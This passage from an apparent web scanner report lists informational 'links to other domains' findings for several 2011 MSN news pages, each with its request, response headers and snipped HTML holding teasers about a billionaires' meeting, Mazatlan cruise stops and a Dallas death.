<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345066&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus&go=&form=msnpop"><strong>
...[SNIP]...
<div>Billionaires Charles and David Koch (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Charles+and+David+Koch+&FORM=msnpop">photos</a>) and their wealthy Republican friends are meeting at the Rancho Las Palmas Resort in Palm Springs, Calif., today. The brothers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&go=&form=msnpop">find out what proposal they recently backed</a>) are reportedly the organizers, and the gathering likely will be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&form=msnpop">met with protests</a>
...[SNIP]...
<div>Many of the world...s top leaders are meeting elsewhere. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&mkt=en-US&FORM=msnpop">See where.</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=rancho+las+palmas+resort&go=&form=msnpop">See photos</a>
...[SNIP]...
<div>Find out how the Koch brothers <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&go=&form=msnpop">made their money</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.316. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx?cp-documentid=27436496

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?encType=1&where1=Mazatlan%2c+Sinaloa%2c+Mexico&qpvt=mazatlan+mexico&FORM=msnpop
http://www.bing.com/music/songs/search?q=Kalimba&FORM=msnpop
http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=cruise+line+security+mazatlan&FORM=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=mexican+singer+rape&go=&form=msnpop
http://www.bing.com/search?q=tips+when+traveling+to+mexico&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345060&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx?cp-documentid=27436496 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff7f4bdf08de4d1e84fb30cb16ca789a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8CCEDA74FEB243D78C6103FEDCFEED26; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:00 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345060&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop"><strong>
...[SNIP]...
<div>Several cruise lines are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop">cancelling stops</a> at the Mexican Pacific port of Mazatlan (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?encType=1&where1=Mazatlan%2c+Sinaloa%2c+Mexico&qpvt=mazatlan+mexico&FORM=msnpop">see map</a>), due to crime against tourists... Safety issues are such a concern, that the cruise..lines are setting up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=cruise+line+security+mazatlan&FORM=msnpop">a big meeting</a>
...[SNIP]...
<div>A popular Mexican singer recently had his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mexican+singer+rape&go=&form=msnpop">rape charges dismissed</a>
...[SNIP]...
<div>Listen to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/songs/search?q=Kalimba&FORM=msnpop">his music here</a>
...[SNIP]...
<div>Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tips+when+traveling+to+mexico&form=msnpop">other tips</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.317. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx?cp-documentid=27436496

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?encType=1&where1=Mazatlan%2c+Sinaloa%2c+Mexico&qpvt=mazatlan+mexico&FORM=msnpop
http://www.bing.com/music/songs/search?q=Kalimba&FORM=msnpop
http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop
http://www.bing.com/search?q=cruise+line+security+mazatlan&FORM=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=mexican+singer+rape&go=&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=tips+when+traveling+to+mexico&form=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406675&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=cb0e13afe0e54167b4ebee22727f3a71; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9144F6DA296741A0AC1AB2134F7BF283; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406675&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop"><strong>
...[SNIP]...
<div>Several cruise lines are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&form=msnpop">cancelling stops</a> at the Mexican Pacific port of Mazatlan (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?encType=1&where1=Mazatlan%2c+Sinaloa%2c+Mexico&qpvt=mazatlan+mexico&FORM=msnpop">see map</a>), due to crime against tourists... Safety issues are such a concern, that the cruise..lines are setting up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=cruise+line+security+mazatlan&FORM=msnpop">a big meeting</a>
...[SNIP]...
<div>A popular Mexican singer recently had his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mexican+singer+rape&go=&form=msnpop">rape charges dismissed</a>
...[SNIP]...
<div>Listen to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/songs/search?q=Kalimba&FORM=msnpop">his music here</a>
...[SNIP]...
<div>Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tips+when+traveling+to+mexico&form=msnpop">other tips</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.318. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx?cp-documentid=27451865

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&form=msnpop
http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&form=msnpop
http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&go=&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&go=&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+death
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345072&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx?cp-documentid=27451865 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f14d0b25d052412f9f1ad851d1b9158c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=22CA2F9360784323B6E2C59E773E563F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345072&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+death"><strong>
...[SNIP]...
<div>A woman is being held by Dallas police (where <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&go=&form=msnpop">was she hiding</a>?) after an argument with her mom allegedly got out of control. Police say a neighbor reported seeing her run over her mom with her car. (How are officials <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&form=msnpop">treating the death</a>?) Police say the incident could be downgraded... <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&go=&form=msnpop">Here...s why</a>
...[SNIP]...
<div>A wrongly convicted man has been freed from a Dallas prison. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&form=msnpop">How long</a>
...[SNIP]...
<div>A bomb scare was reported at the Super Bowl stadium. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&form=msnpop">Here...s what</a>
...[SNIP]...
<div>A reported kidnapping turned out to be a ruse. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&form=msnpop">Here...s who</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.319. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx?cp-documentid=27451865

The response contains the following links to other domains:

